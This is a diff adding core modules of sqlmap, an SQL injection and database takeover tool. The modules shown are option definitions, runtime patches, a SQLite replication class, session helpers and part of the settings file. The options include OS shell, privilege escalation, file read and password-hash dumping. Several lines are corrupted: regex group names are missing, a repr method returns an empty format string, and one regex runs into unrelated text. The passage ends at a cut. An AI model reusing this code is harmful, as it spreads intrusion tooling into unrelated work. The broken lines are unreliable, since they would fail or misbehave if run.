_setTamperingFunctions() + _setPreprocessFunctions() + _setPostprocessFunctions() + _setTrafficOutputFP() + _setupHTTPCollector() + _setHttpChunked() + _checkWebSocket() + + parseTargetDirect() + + if any((conf.url, conf.logFile, conf.bulkFile, conf.requestFile, conf.googleDork, conf.stdinPipe)): + _setHostname() + _setHTTPTimeout() + _setHTTPExtraHeaders() + _setHTTPCookies() + _setHTTPReferer() + _setHTTPHost() + _setHTTPUserAgent() + _setHTTPAuthentication() + _setHTTPHandlers() + _setDNSCache() + _setSocketPreConnect() + _setSafeVisit() + _doSearch() + _setStdinPipeTargets() + _setBulkMultipleTargets() + _checkTor() + _setCrawler() + _findPageForms() + _setDBMS() + _setTechnique() + + _setThreads() + _setOS() + _setWriteFile() + _setMetasploit() + _setDBMSAuthentication() + loadBoundaries() + loadPayloads() + _setPrefixSuffix() + update() + _loadQueries() diff --git a/src/sqlmap-master/lib/core/optiondict.py b/src/sqlmap-master/lib/core/optiondict.py new file mode 100644 index 0000000..a704741 --- /dev/null +++ b/src/sqlmap-master/lib/core/optiondict.py @@ -0,0 +1,278 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +optDict = { + # Family: {"parameter name": "parameter datatype"}, + # --OR-- + # Family: {"parameter name": ("parameter datatype", "category name used for common outputs feature")}, + + "Target": { + "direct": "string", + "url": "string", + "logFile": "string", + "bulkFile": "string", + "requestFile": "string", + "sessionFile": "string", + "googleDork": "string", + "configFile": "string", + }, + + "Request": { + "method": "string", + "data": "string", + "paramDel": "string", + "cookie": "string", + "cookieDel": "string", + "liveCookies": "string", + "loadCookies": "string", + "dropSetCookie": "boolean", + "agent": "string", + "mobile": "boolean", + "randomAgent": "boolean", + "host": "string", + "referer": "string", + "headers": "string", + "authType": "string", + "authCred": "string", + "authFile": "string", + "abortCode": "string", + "ignoreCode": "string", + "ignoreProxy": "boolean", + "ignoreRedirects": "boolean", + "ignoreTimeouts": "boolean", + "proxy": "string", + "proxyCred": "string", + "proxyFile": "string", + "proxyFreq": "integer", + "tor": "boolean", + "torPort": "integer", + "torType": "string", + "checkTor": "boolean", + "delay": "float", + "timeout": "float", + "retries": "integer", + "retryOn": "string", + "rParam": "string", + "safeUrl": "string", + "safePost": "string", + "safeReqFile": "string", + "safeFreq": "integer", + "skipUrlEncode": "boolean", + "csrfToken": "string", + "csrfUrl": "string", + "csrfMethod": "string", + "csrfData": "string", + "csrfRetries": "integer", + "forceSSL": "boolean", + "chunked": "boolean", + "hpp": "boolean", + "evalCode": "string", + }, + + "Optimization": { + "optimize": "boolean", + "predictOutput": "boolean", + "keepAlive": "boolean", + "nullConnection": "boolean", + "threads": "integer", + }, + + "Injection": { + "testParameter": "string", + "skip": "string", + "skipStatic": "boolean", + "paramExclude": "string", + "paramFilter": "string", + "dbms": "string", + "dbmsCred": "string", + "os": "string", + "invalidBignum": "boolean", + "invalidLogical": "boolean", + "invalidString": "boolean", + "noCast": "boolean", + "noEscape": "boolean", + "prefix": "string", + "suffix": "string", + "tamper": "string", + }, + + "Detection": { + "level": "integer", + "risk": "integer", + "string": "string", + "notString": "string", + "regexp": "string", + "code": "integer", + "smart": "boolean", + "textOnly": "boolean", + "titles": "boolean", + }, + + "Techniques": { + "technique": "string", + "timeSec": "integer", + "uCols": "string", + "uChar": "string", + "uFrom": "string", + "uValues": "string", + "dnsDomain": "string", + "secondUrl": "string", + "secondReq": "string", + }, + + "Fingerprint": { + "extensiveFp": "boolean", + }, + + "Enumeration": { + "getAll": "boolean", + "getBanner": ("boolean", "Banners"), + "getCurrentUser": ("boolean", "Users"), + "getCurrentDb": ("boolean", "Databases"), + "getHostname": "boolean", + "isDba": "boolean", + "getUsers": ("boolean", "Users"), + "getPasswordHashes": ("boolean", "Passwords"), + "getPrivileges": ("boolean", "Privileges"), + "getRoles": ("boolean", "Roles"), + "getDbs": ("boolean", "Databases"), + "getTables": ("boolean", "Tables"), + "getColumns": ("boolean", "Columns"), + "getSchema": "boolean", + "getCount": "boolean", + "dumpTable": "boolean", + "dumpAll": "boolean", + "search": "boolean", + "getComments": "boolean", + "getStatements": "boolean", + "db": "string", + "tbl": "string", + "col": "string", + "exclude": "string", + "pivotColumn": "string", + "dumpWhere": "string", + "user": "string", + "excludeSysDbs": "boolean", + "limitStart": "integer", + "limitStop": "integer", + "firstChar": "integer", + "lastChar": "integer", + "sqlQuery": "string", + "sqlShell": "boolean", + "sqlFile": "string", + }, + + "Brute": { + "commonTables": "boolean", + "commonColumns": "boolean", + "commonFiles": "boolean", + }, + + "User-defined function": { + "udfInject": "boolean", + "shLib": "string", + }, + + "File system": { + "fileRead": "string", + "fileWrite": "string", + "fileDest": "string", + }, + + "Takeover": { + "osCmd": "string", + "osShell": "boolean", + "osPwn": "boolean", + "osSmb": "boolean", + "osBof": "boolean", + "privEsc": "boolean", + "msfPath": "string", + "tmpPath": "string", + }, + + "Windows": { + "regRead": "boolean", + "regAdd": "boolean", + "regDel": "boolean", + "regKey": "string", + "regVal": "string", + "regData": "string", + "regType": "string", + }, + + "General": { + "trafficFile": "string", + "abortOnEmpty": "boolean", + "answers": "string", + "batch": "boolean", + "base64Parameter": "string", + "base64Safe": "boolean", + "binaryFields": "string", + "charset": "string", + "checkInternet": "boolean", + "cleanup": "boolean", + "crawlDepth": "integer", + "crawlExclude": "string", + "csvDel": "string", + "dumpFile": "string", + "dumpFormat": "string", + "encoding": "string", + "eta": "boolean", + "flushSession": "boolean", + "forms": "boolean", + "freshQueries": "boolean", + "googlePage": "integer", + "harFile": "string", + "hexConvert": "boolean", + "outputDir": "string", + "parseErrors": "boolean", + "postprocess": "string", + "preprocess": "string", + "repair": "boolean", + "saveConfig": "string", + "scope": "string", + "skipHeuristics": "boolean", + "skipWaf": "boolean", + "testFilter": "string", + "testSkip": "string", + "timeLimit": "float", + "unsafeNaming": "boolean", + "webRoot": "string", + }, + + "Miscellaneous": { + "alert": "string", + "beep": "boolean", + "dependencies": "boolean", + "disableColoring": "boolean", + "listTampers": "boolean", + "noLogging": "boolean", + "offline": "boolean", + "purge": "boolean", + "resultsFile": "string", + "tmpDir": "string", + "unstable": "boolean", + "updateAll": "boolean", + "wizard": "boolean", + "verbose": "integer", + }, + + "Hidden": { + "dummy": "boolean", + "disablePrecon": "boolean", + "profile": "boolean", + "forceDns": "boolean", + "murphyRate": "integer", + "smokeTest": "boolean", + }, + + "API": { + "api": "boolean", + "taskid": "string", + "database": "string", + } +} diff --git a/src/sqlmap-master/lib/core/patch.py b/src/sqlmap-master/lib/core/patch.py new file mode 100644 index 0000000..2add0e8 --- /dev/null +++ b/src/sqlmap-master/lib/core/patch.py @@ -0,0 +1,214 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import codecs +import collections +import inspect +import logging +import os +import random +import re +import sys + +import lib.controller.checks +import lib.core.common +import lib.core.convert +import lib.core.option +import lib.core.threads +import lib.request.connect +import lib.utils.search +import lib.utils.sqlalchemy +import thirdparty.ansistrm.ansistrm +import thirdparty.chardet.universaldetector + +from lib.core.common import filterNone +from lib.core.common import getSafeExString +from lib.core.common import isDigit +from lib.core.common import isListLike +from lib.core.common import readInput +from lib.core.common import shellExec +from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange +from lib.core.convert import stdoutEncode +from lib.core.data import conf +from lib.core.enums import PLACE +from lib.core.option import _setHTTPHandlers +from lib.core.option import setVerbosity +from lib.core.settings import INVALID_UNICODE_PRIVATE_AREA +from lib.core.settings import INVALID_UNICODE_CHAR_FORMAT +from lib.core.settings import IS_WIN +from lib.request.templates import getPageTemplate +from thirdparty import six +from thirdparty.six import unichr as _unichr +from thirdparty.six.moves import http_client as _http_client + +_rand = 0 + +def dirtyPatches(): + """ + Place for "dirty" Python related patches + """ + + # accept overly long result lines (e.g. SQLi results in HTTP header responses) + _http_client._MAXLINE = 1 * 1024 * 1024 + + # prevent double chunked encoding in case of sqlmap chunking (Note: Python3 does it automatically if 'Content-length' is missing) + if six.PY3: + if not hasattr(_http_client.HTTPConnection, "__send_output"): + _http_client.HTTPConnection.__send_output = _http_client.HTTPConnection._send_output + + def _send_output(self, *args, **kwargs): + if conf.get("chunked") and "encode_chunked" in kwargs: + kwargs["encode_chunked"] = False + self.__send_output(*args, **kwargs) + + _http_client.HTTPConnection._send_output = _send_output + + # add support for inet_pton() on Windows OS + if IS_WIN: + from thirdparty.wininetpton import win_inet_pton + + # Reference: https://github.com/nodejs/node/issues/12786#issuecomment-298652440 + codecs.register(lambda name: codecs.lookup("utf-8") if name == "cp65001" else None) + + # Reference: http://bugs.python.org/issue17849 + if hasattr(_http_client, "LineAndFileWrapper"): + def _(self, *args): + return self._readline() + + _http_client.LineAndFileWrapper._readline = _http_client.LineAndFileWrapper.readline + _http_client.LineAndFileWrapper.readline = _ + + # to prevent too much "guessing" in case of binary data retrieval + thirdparty.chardet.universaldetector.MINIMUM_THRESHOLD = 0.90 + + match = re.search(r" --method[= ](\w+)", " ".join(sys.argv)) + if match and match.group(1).upper() != PLACE.POST: + PLACE.CUSTOM_POST = PLACE.CUSTOM_POST.replace("POST", "%s (body)" % match.group(1)) + + # Reference: https://github.com/sqlmapproject/sqlmap/issues/4314 + try: + os.urandom(1) + except NotImplementedError: + if six.PY3: + os.urandom = lambda size: bytes(random.randint(0, 255) for _ in range(size)) + else: + os.urandom = lambda size: "".join(chr(random.randint(0, 255)) for _ in xrange(size)) + + # Reference: https://github.com/sqlmapproject/sqlmap/issues/5727 + # Reference: https://stackoverflow.com/a/14076841 + try: + import pymysql + pymysql.install_as_MySQLdb() + except (ImportError, AttributeError): + pass + + # Reference: https://github.com/bottlepy/bottle/blob/df67999584a0e51ec5b691146c7fa4f3c87f5aac/bottle.py + # Reference: https://python.readthedocs.io/en/v2.7.2/library/inspect.html#inspect.getargspec + if not hasattr(inspect, "getargspec") and hasattr(inspect, "getfullargspec"): + ArgSpec = collections.namedtuple("ArgSpec", ("args", "varargs", "keywords", "defaults")) + + def makelist(data): + if isinstance(data, (tuple, list, set, dict)): + return list(data) + elif data: + return [data] + else: + return [] + + def getargspec(func): + spec = inspect.getfullargspec(func) + kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs) + return ArgSpec(kwargs, spec[1], spec[2], spec[3]) + + inspect.getargspec = getargspec + + # Installing "reversible" unicode (decoding) error handler + def _reversible(ex): + if INVALID_UNICODE_PRIVATE_AREA: + return (u"".join(_unichr(int('000f00%2x' % (_ if isinstance(_, int) else ord(_)), 16)) for _ in ex.object[ex.start:ex.end]), ex.end) + else: + return (u"".join(INVALID_UNICODE_CHAR_FORMAT % (_ if isinstance(_, int) else ord(_)) for _ in ex.object[ex.start:ex.end]), ex.end) + + codecs.register_error("reversible", _reversible) + + # Reference: https://github.com/sqlmapproject/sqlmap/issues/5731 + if not hasattr(logging, "_acquireLock"): + def _acquireLock(): + if logging._lock: + logging._lock.acquire() + + logging._acquireLock = _acquireLock + + if not hasattr(logging, "_releaseLock"): + def _releaseLock(): + if logging._lock: + logging._lock.release() + + logging._releaseLock = _releaseLock + +def resolveCrossReferences(): + """ + Place for cross-reference resolution + """ + + lib.core.threads.isDigit = isDigit + lib.core.threads.readInput = readInput + lib.core.common.getPageTemplate = getPageTemplate + lib.core.convert.filterNone = filterNone + lib.core.convert.isListLike = isListLike + lib.core.convert.shellExec = shellExec + lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage + lib.core.option._pympTempLeakPatch = pympTempLeakPatch + lib.request.connect.setHTTPHandlers = _setHTTPHandlers + lib.utils.search.setHTTPHandlers = _setHTTPHandlers + lib.controller.checks.setVerbosity = setVerbosity + lib.utils.sqlalchemy.getSafeExString = getSafeExString + thirdparty.ansistrm.ansistrm.stdoutEncode = stdoutEncode + +def pympTempLeakPatch(tempDir): + """ + Patch for "pymp" leaking directories inside Python3 + """ + + try: + import multiprocessing.util + multiprocessing.util.get_temp_dir = lambda: tempDir + except: + pass + +def unisonRandom(): + """ + Unifying random generated data across different Python versions + """ + + def _lcg(): + global _rand + a = 1140671485 + c = 128201163 + m = 2 ** 24 + _rand = (a * _rand + c) % m + return _rand + + def _randint(a, b): + _ = a + (_lcg() % (b - a + 1)) + return _ + + def _choice(seq): + return seq[_randint(0, len(seq) - 1)] + + def _sample(population, k): + return [_choice(population) for _ in xrange(k)] + + def _seed(seed): + global _rand + _rand = seed + + random.choice = _choice + random.randint = _randint + random.sample = _sample + random.seed = _seed diff --git a/src/sqlmap-master/lib/core/profiling.py b/src/sqlmap-master/lib/core/profiling.py new file mode 100644 index 0000000..6d3de01 --- /dev/null +++ b/src/sqlmap-master/lib/core/profiling.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import cProfile +import os + +from lib.core.data import logger +from lib.core.data import paths + +def profile(profileOutputFile=None): + """ + This will run the program and present profiling data in a nice looking graph + """ + + if profileOutputFile is None: + profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.raw") + + if os.path.exists(profileOutputFile): + os.remove(profileOutputFile) + + # Start sqlmap main function and generate a raw profile file + cProfile.run("start()", profileOutputFile) + + infoMsg = "execution profiled and stored into file '%s' (e.g. 'gprof2dot -f pstats %s | dot -Tpng -o /tmp/sqlmap_profile.png')" % (profileOutputFile, profileOutputFile) + logger.info(infoMsg) diff --git a/src/sqlmap-master/lib/core/readlineng.py b/src/sqlmap-master/lib/core/readlineng.py new file mode 100644 index 0000000..602ccaf --- /dev/null +++ b/src/sqlmap-master/lib/core/readlineng.py @@ -0,0 +1,62 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +_readline = None +try: + from readline import * + import readline as _readline +except: + try: + from pyreadline import * + import pyreadline as _readline + except: + pass + +from lib.core.data import logger +from lib.core.settings import IS_WIN +from lib.core.settings import PLATFORM + +if IS_WIN and _readline: + try: + _outputfile = _readline.GetOutputFile() + except AttributeError: + debugMsg = "Failed GetOutputFile when using platform's " + debugMsg += "readline library" + logger.debug(debugMsg) + + _readline = None + +# Test to see if libedit is being used instead of GNU readline. +# Thanks to Boyd Waters for this patch. +uses_libedit = False + +if PLATFORM == "mac" and _readline: + import commands + + (status, result) = commands.getstatusoutput("otool -L %s | grep libedit" % _readline.__file__) + + if status == 0 and len(result) > 0: + # We are bound to libedit - new in Leopard + _readline.parse_and_bind("bind ^I rl_complete") + + debugMsg = "Leopard libedit detected when using platform's " + debugMsg += "readline library" + logger.debug(debugMsg) + + uses_libedit = True + +# the clear_history() function was only introduced in Python 2.4 and is +# actually optional in the readline API, so we must explicitly check for its +# existence. Some known platforms actually don't have it. This thread: +# http://mail.python.org/pipermail/python-dev/2003-August/037845.html +# has the original discussion. +if _readline: + if not hasattr(_readline, "clear_history"): + def clear_history(): + pass + + _readline.clear_history = clear_history diff --git a/src/sqlmap-master/lib/core/replication.py b/src/sqlmap-master/lib/core/replication.py new file mode 100644 index 0000000..c425568 --- /dev/null +++ b/src/sqlmap-master/lib/core/replication.py @@ -0,0 +1,129 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import sqlite3 + +from lib.core.common import cleanReplaceUnicode +from lib.core.common import getSafeExString +from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapGenericException +from lib.core.exception import SqlmapValueException +from lib.core.settings import UNICODE_ENCODING +from lib.utils.safe2bin import safechardecode + +class Replication(object): + """ + This class holds all methods/classes used for database + replication purposes. + """ + + def __init__(self, dbpath): + try: + self.dbpath = dbpath + self.connection = sqlite3.connect(dbpath) + self.connection.isolation_level = None + self.cursor = self.connection.cursor() + except sqlite3.OperationalError as ex: + errMsg = "error occurred while opening a replication " + errMsg += "file '%s' ('%s')" % (dbpath, getSafeExString(ex)) + raise SqlmapConnectionException(errMsg) + + class DataType(object): + """ + Using this class we define auxiliary objects + used for representing sqlite data types. + """ + + def __init__(self, name): + self.name = name + + def __str__(self): + return self.name + + def __repr__(self): + return "" % self + + class Table(object): + """ + This class defines methods used to manipulate table objects. + """ + + def __init__(self, parent, name, columns=None, create=True, typeless=False): + self.parent = parent + self.name = unsafeSQLIdentificatorNaming(name) + self.columns = columns + if create: + try: + self.execute('DROP TABLE IF EXISTS "%s"' % self.name) + if not typeless: + self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns))) + else: + self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns))) + except Exception as ex: + errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, UNICODE_ENCODING) + errMsg += "located at '%s'" % self.parent.dbpath + raise SqlmapGenericException(errMsg) + + def insert(self, values): + """ + This function is used for inserting row(s) into current table. + """ + + if len(values) == len(self.columns): + self.execute('INSERT INTO "%s" VALUES (%s)' % (self.name, ','.join(['?'] * len(values))), safechardecode(values)) + else: + errMsg = "wrong number of columns used in replicating insert" + raise SqlmapValueException(errMsg) + + def execute(self, sql, parameters=None): + try: + try: + self.parent.cursor.execute(sql, parameters or []) + except UnicodeError: + self.parent.cursor.execute(sql, cleanReplaceUnicode(parameters or [])) + except sqlite3.OperationalError as ex: + errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING) + errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath + errMsg += "it's not used by some other program" + raise SqlmapGenericException(errMsg) + + def beginTransaction(self): + """ + Great speed improvement can be gained by using explicit transactions around multiple inserts. + Reference: http://stackoverflow.com/questions/4719836/python-and-sqlite3-adding-thousands-of-rows + """ + self.execute('BEGIN TRANSACTION') + + def endTransaction(self): + self.execute('END TRANSACTION') + + def select(self, condition=None): + """ + This function is used for selecting row(s) from current table. + """ + _ = 'SELECT * FROM %s' % self.name + if condition: + _ += 'WHERE %s' % condition + return self.execute(_) + + def createTable(self, tblname, columns=None, typeless=False): + """ + This function creates Table instance with current connection settings. + """ + return Replication.Table(parent=self, name=tblname, columns=columns, typeless=typeless) + + def __del__(self): + self.cursor.close() + self.connection.close() + + # sqlite data types + NULL = DataType('NULL') + INTEGER = DataType('INTEGER') + REAL = DataType('REAL') + TEXT = DataType('TEXT') + BLOB = DataType('BLOB') diff --git a/src/sqlmap-master/lib/core/revision.py b/src/sqlmap-master/lib/core/revision.py new file mode 100644 index 0000000..b3e5a04 --- /dev/null +++ b/src/sqlmap-master/lib/core/revision.py @@ -0,0 +1,66 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import os +import re +import subprocess + +from lib.core.common import openFile +from lib.core.convert import getText + +def getRevisionNumber(): + """ + Returns abbreviated commit hash number as retrieved with "git rev-parse --short HEAD" + + >>> len(getRevisionNumber() or (' ' * 7)) == 7 + True + """ + + retVal = None + filePath = None + _ = os.path.dirname(__file__) + + while True: + filePath = os.path.join(_, ".git", "HEAD") + if os.path.exists(filePath): + break + else: + filePath = None + if _ == os.path.dirname(_): + break + else: + _ = os.path.dirname(_) + + while True: + if filePath and os.path.isfile(filePath): + with openFile(filePath, "r") as f: + content = getText(f.read()) + filePath = None + + if content.startswith("ref: "): + try: + filePath = os.path.join(_, ".git", content.replace("ref: ", "")).strip() + except UnicodeError: + pass + + if filePath is None: + match = re.match(r"(?i)[0-9a-f]{32}", content) + retVal = match.group(0) if match else None + break + else: + break + + if not retVal: + try: + process = subprocess.Popen("git rev-parse --verify HEAD", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + stdout, _ = process.communicate() + match = re.search(r"(?i)[0-9a-f]{32}", getText(stdout or "")) + retVal = match.group(0) if match else None + except: + pass + + return retVal[:7] if retVal else None diff --git a/src/sqlmap-master/lib/core/session.py b/src/sqlmap-master/lib/core/session.py new file mode 100644 index 0000000..52b6ed6 --- /dev/null +++ b/src/sqlmap-master/lib/core/session.py @@ -0,0 +1,79 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.common import hashDBWrite +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import HASHDB_KEYS +from lib.core.enums import OS +from lib.core.settings import SUPPORTED_DBMS + +def setDbms(dbms): + """ + @param dbms: database management system to be set into the knowledge + base as fingerprint. + @type dbms: C{str} + """ + + hashDBWrite(HASHDB_KEYS.DBMS, dbms) + + _ = "(%s)" % ('|'.join(SUPPORTED_DBMS)) + _ = re.search(r"\A%s( |\Z)" % _, dbms, re.I) + + if _: + dbms = _.group(1) + + Backend.setDbms(dbms) + if kb.resolutionDbms: + hashDBWrite(HASHDB_KEYS.DBMS, kb.resolutionDbms) + + logger.info("the back-end DBMS is %s" % Backend.getDbms()) + +def setOs(): + """ + Example of kb.bannerFp dictionary: + + { + 'sp': set(['Service Pack 4']), + 'dbmsVersion': '8.00.194', + 'dbmsServicePack': '0', + 'distrib': set(['2000']), + 'dbmsRelease': '2000', + 'type': set(['Windows']) + } + """ + + infoMsg = "" + + if not kb.bannerFp: + return + + if "type" in kb.bannerFp: + Backend.setOs(Format.humanize(kb.bannerFp["type"])) + infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() + + if "distrib" in kb.bannerFp: + kb.osVersion = Format.humanize(kb.bannerFp["distrib"]) + infoMsg += " %s" % kb.osVersion + + if "sp" in kb.bannerFp: + kb.osSP = int(Format.humanize(kb.bannerFp["sp"]).replace("Service Pack ", "")) + + elif "sp" not in kb.bannerFp and Backend.isOs(OS.WINDOWS): + kb.osSP = 0 + + if Backend.getOs() and kb.osVersion and kb.osSP: + infoMsg += " Service Pack %d" % kb.osSP + + if infoMsg: + logger.info(infoMsg) + + hashDBWrite(HASHDB_KEYS.OS, Backend.getOs()) diff --git a/src/sqlmap-master/lib/core/settings.py b/src/sqlmap-master/lib/core/settings.py new file mode 100644 index 0000000..1a767b7 --- /dev/null +++ b/src/sqlmap-master/lib/core/settings.py @@ -0,0 +1,960 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import codecs +import os +import random +import re +import string +import sys +import time + +from lib.core.enums import DBMS +from lib.core.enums import DBMS_DIRECTORY_NAME +from lib.core.enums import OS +from thirdparty import six + +# sqlmap version (...) +VERSION = "1.8.9.1" +TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" +TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} +VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) +DESCRIPTION = "automatic SQL injection and database takeover tool" +SITE = "https://sqlmap.org" +DEFAULT_USER_AGENT = "%s (%s)" % (VERSION_STRING, SITE) +DEV_EMAIL_ADDRESS = "dev@sqlmap.org" +ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new" +GIT_REPOSITORY = "https://github.com/sqlmapproject/sqlmap.git" +GIT_PAGE = "https://github.com/sqlmapproject/sqlmap" +WIKI_PAGE = "https://github.com/sqlmapproject/sqlmap/wiki/" +ZIPBALL_PAGE = "https://github.com/sqlmapproject/sqlmap/zipball/master" + +# colorful banner +BANNER = """\033[01;33m\ + ___ + __H__ + ___ ___[.]_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m +|_ -| . [.] | .'| . | +|___|_ [.]_|_|_|__,| _| + |_|V... |_| \033[0m\033[4;37m%s\033[0m\n +""" % (TYPE_COLORS.get(TYPE, 31), VERSION_STRING.split('/')[-1], SITE) + +# Minimum distance of ratio from kb.matchRatio to result in True +DIFF_TOLERANCE = 0.05 +CONSTANT_RATIO = 0.9 + +# Ratio used in heuristic check for WAF/IPS protected targets +IPS_WAF_CHECK_RATIO = 0.5 + +# Timeout used in heuristic check for WAF/IPS protected targets +IPS_WAF_CHECK_TIMEOUT = 10 + +# Timeout used in checking for existence of live-cookies file +LIVE_COOKIES_TIMEOUT = 120 + +# Lower and upper values for match ratio in case of stable page +LOWER_RATIO_BOUND = 0.02 +UPPER_RATIO_BOUND = 0.98 + +# Markers for special cases when parameter values contain html encoded characters +PARAMETER_AMP_MARKER = "__AMP__" +PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__" +BOUNDARY_BACKSLASH_MARKER = "__BACKSLASH__" +PARAMETER_PERCENTAGE_MARKER = "__PERCENTAGE__" +PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__" +PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__" +URI_QUESTION_MARKER = "__QUESTION__" +ASTERISK_MARKER = "__ASTERISK__" +REPLACEMENT_MARKER = "__REPLACEMENT__" +BOUNDED_BASE64_MARKER = "__BOUNDED_BASE64__" +BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION__" +SAFE_VARIABLE_MARKER = "__SAFE__" +SAFE_HEX_MARKER = "__SAFE_HEX__" +DOLLAR_MARKER = "__DOLLAR__" + +RANDOM_INTEGER_MARKER = "[RANDINT]" +RANDOM_STRING_MARKER = "[RANDSTR]" +SLEEP_TIME_MARKER = "[SLEEPTIME]" +INFERENCE_MARKER = "[INFERENCE]" +SINGLE_QUOTE_MARKER = "[SINGLE_QUOTE]" +GENERIC_SQL_COMMENT_MARKER = "[GENERIC_SQL_COMMENT]" + +PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__" +CHAR_INFERENCE_MARK = "%c" +PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]" + +# Regular expression used for extraction of table names (useful for (e.g.) MsAccess) +SELECT_FROM_TABLE_REGEX = r"\bSELECT\b.+?\bFROM\s+(?P([\w.]|`[^`<>]+`)+)" + +# Regular expression used for recognition of textual content-type +TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)" + +# Regular expression used for recognition of generic permission messages +PERMISSION_DENIED_REGEX = r"(?P(command|permission|access)\s*(was|is)?\s*denied)" + +# Regular expression used in recognition of generic protection mechanisms +GENERIC_PROTECTION_REGEX = r"(?i)\b(rejected|blocked|protection|incident|denied|detected|dangerous|firewall)\b" + +# Regular expression used to detect errors in fuzz(y) UNION test +FUZZ_UNION_ERROR_REGEX = r"(?i)data\s?type|comparable|compatible|conversion|converting|failed|error" + +# Upper threshold for starting the fuzz(y) UNION test +FUZZ_UNION_MAX_COLUMNS = 10 + +# Regular expression used for recognition of generic maximum connection messages +MAX_CONNECTIONS_REGEX = r"\bmax.{1,100}\bconnection" + +# Maximum consecutive connection errors before asking the user if he wants to continue +MAX_CONSECUTIVE_CONNECTION_ERRORS = 15 + +# Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it) +PRECONNECT_CANDIDATE_TIMEOUT = 10 + +# Servers known to cause issue with pre-connection mechanism (because of lack of multi-threaded support) +PRECONNECT_INCOMPATIBLE_SERVERS = ("SimpleHTTP", "BaseHTTP") + +# Identify WAF/IPS inside limited number of responses (Note: for optimization purposes) +IDENTYWAF_PARSE_LIMIT = 10 + +# Maximum sleep time in "Murphy" (testing) mode +MAX_MURPHY_SLEEP_TIME = 3 + +# Regular expression used for extracting results from Google search +GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)" + +# Google Search consent cookie +GOOGLE_CONSENT_COOKIE = "CONSENT=YES+shp.gws-%s-0-RC1.%s+FX+740" % (time.strftime("%Y%m%d"), "".join(random.sample(string.ascii_lowercase, 2))) + +# Regular expression used for extracting results from DuckDuckGo search +DUCKDUCKGO_REGEX = r'= 7) +TIME_STDEV_COEFF = 7 + +# Minimum response time that can be even considered as delayed (not a complete requirement) +MIN_VALID_DELAYED_RESPONSE = 0.5 + +# Standard deviation after which a warning message should be displayed about connection lags +WARN_TIME_STDEV = 0.5 + +# Minimum length of usable union injected response (quick defense against substr fields) +UNION_MIN_RESPONSE_CHARS = 10 + +# Coefficient used for a union-based number of columns checking (must be >= 7) +UNION_STDEV_COEFF = 7 + +# Length of queue for candidates for time delay adjustment +TIME_DELAY_CANDIDATES = 3 + +# Default value for HTTP Accept header +HTTP_ACCEPT_HEADER_VALUE = "*/*" + +# Default value for HTTP Accept-Encoding header +HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate" + +# Default timeout for running commands over backdoor +BACKDOOR_RUN_CMD_TIMEOUT = 5 + +# Number of seconds to wait for thread finalization at program end +THREAD_FINALIZATION_TIMEOUT = 1 + +# Maximum number of techniques used in inject.py/getValue() per one value +MAX_TECHNIQUES_PER_VALUE = 2 + +# In case of missing piece of partial union dump, buffered array must be flushed after certain size +MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024 + +# Maximum size of cache used in @cachedmethod decorator +MAX_CACHE_ITEMS = 256 + +# Suffix used for naming meta databases in DBMS(es) without explicit database name +METADB_SUFFIX = "_masterdb" + +# Number of times to retry the pushValue during the exceptions (e.g. KeyboardInterrupt) 